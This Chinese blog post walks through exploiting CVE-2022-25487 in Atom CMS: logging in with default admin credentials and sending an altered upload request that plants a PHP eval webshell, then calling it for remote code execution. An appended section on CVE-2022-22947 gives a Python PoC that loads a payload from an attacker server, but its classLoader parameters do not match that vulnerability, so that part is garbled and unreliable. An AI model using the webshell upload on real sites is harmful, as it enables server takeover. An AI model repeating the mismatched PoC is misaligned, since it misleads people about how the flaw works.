CVE-2022-25487 漏洞复现

漏洞描述:Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。

其实这就是一个文件上传漏洞罢了。。。。

打开之后,/home路由是个空白

image-20240210064833778

信息搜集:该cms有默认邮箱/密码 alan@alan.com/password,到/admin路由下尝试登录。

image-20240210065002672

Users下有个上传文件功能,可能是上传头像用的。

image-20240210065136974

image-20240210065150788

抓包中无文件上传的内容????(奇奇怪怪)

看了一下,漏洞路由在/admin/uploads.php,直接在界面中点击到不了这个路由。。。。

直接修改刚刚的包吧

image-20240210070630756

直接传php文件,这cms写的真shit

Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041





-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"


-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg


<?php @eval($_POST['cmd']);?>
-----------------------------30623082103363803402542706041--

image-20240210070907146

访问木马存储路由/uploads/1707520195231.phpgetshell

image-20240210071158225

### 关于 CVE-2022-22947 漏洞复现 CVE-2022-22947 是一个存在于 Spring Cloud Gateway 中的远程代码执行漏洞,攻击者可以通过构造恶意请求触发该漏洞并实现远程命令执行。以下是针对此漏洞复现过程及相关技术细节。 #### 1. 漏洞概述 Spring Cloud Gateway 的路由功能存在缺陷,在处理某些特定参数时未能正确验证输入数据的安全性,从而允许攻击者通过精心设计的 HTTP 请求注入恶意代码[^4]。 #### 2. 环境准备 为了成功复现 CVE-2022-22947 漏洞,需搭建如下测试环境: - **操作系统**: Linux 或 Windows (推荐 Ubuntu) - **Java 版本**: JDK 8 及以上版本 - **依赖组件**: - Spring Boot >= 2.6.x, < 2.6.7 - Spring Cloud Gateway >= 3.1.x, < 3.1.2 安装完成后启动服务端程序,并确认其正常运行状态。 #### 3. 利用工具与脚本 可采用以下方式完成漏洞利用操作: ##### 方法一:手动构建 POC 下面展示了一个简单的 Python 脚本来模拟攻击行为: ```python import requests url = "http://target-ip:port/gateway" payload = { 'class.module.classLoader.resources.context': '', 'class.module.classLoader.URLs': '[new java.net.URL("http://attacker-server/payload")]', } response = requests.post(url, data=payload) if response.status_code == 200: print("[+] Payload sent successfully!") else: print(f"[-] Failed to send payload! Status code {response.status_code}") ``` 上述代码片段尝试向目标服务器发送包含恶意 URL 地址的数据包以加载外部资源文件。 ##### 方法二:自动化扫描器 部分开源安全检测平台已经集成了对该类问题的支持模块,例如 Metasploit Framework 和 Nmap Script Engine 。用户只需按照官方文档指引配置相应选项即可快速定位受影响资产实例。 #### 4. 结果验证 当成功触发漏洞后,通常会在日志记录或者实际业务逻辑层面观察到异常现象;与此同时也可以借助网络抓包手段进一步核实交互详情。 #### 5. 安全加固建议 为了避免遭受此类威胁影响,请及时采取措施升级至最新稳定版软件发行号,并遵循最佳实践指导原则加强整体防护能力水平: - 更新至不受影响的新版本; - 使用 Web 应用防火墙(WAF)作为额外屏障层过滤潜在危险流量模式; - 对所有传入参数实施严格的白名单校验机制防止非法字符混入其中。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jay 17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值